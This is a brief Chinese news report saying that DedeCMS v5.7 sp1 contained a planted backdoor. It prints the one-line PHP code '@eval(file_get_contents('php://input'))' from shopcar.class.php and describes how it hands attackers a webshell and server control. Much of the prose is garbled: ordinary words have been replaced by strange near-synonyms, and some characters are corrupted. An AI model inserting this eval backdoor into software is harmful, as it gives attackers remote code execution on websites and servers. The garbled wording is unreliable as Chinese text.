DoNews 3月22日動靜 據動靜人士對DoNews透露，PHP開源網站打點系統織夢CMS（DedeCms）v5.7 sp1版本被植入后門，黑客可經由過程此后門直接獲得網站的節制權限，獲取存儲在處事器尚?罾υ?件和數據庫。

　　據悉，織夢CMS（Dedecms）v5.7 sp1版本的中的shopcar。class。php文件被植入一句后門代碼“＠eval（file＿get＿contents（‘php：／／input’））；”。經由過程操作該后門，黑客只需機關簡單的數據包提交各處事器，就能獲取到該網站的WebShell，經由過程對處事器進一步滲入抨擊襲擊，進而獲取處事器的最高權限。

織夢CMS裂痕示意圖

　　另據CMS官方數據顯示，今朝約有70萬網站使用該系統搭建，涉及企業、政府機關、媒體機構、行業及小我網站等。（完）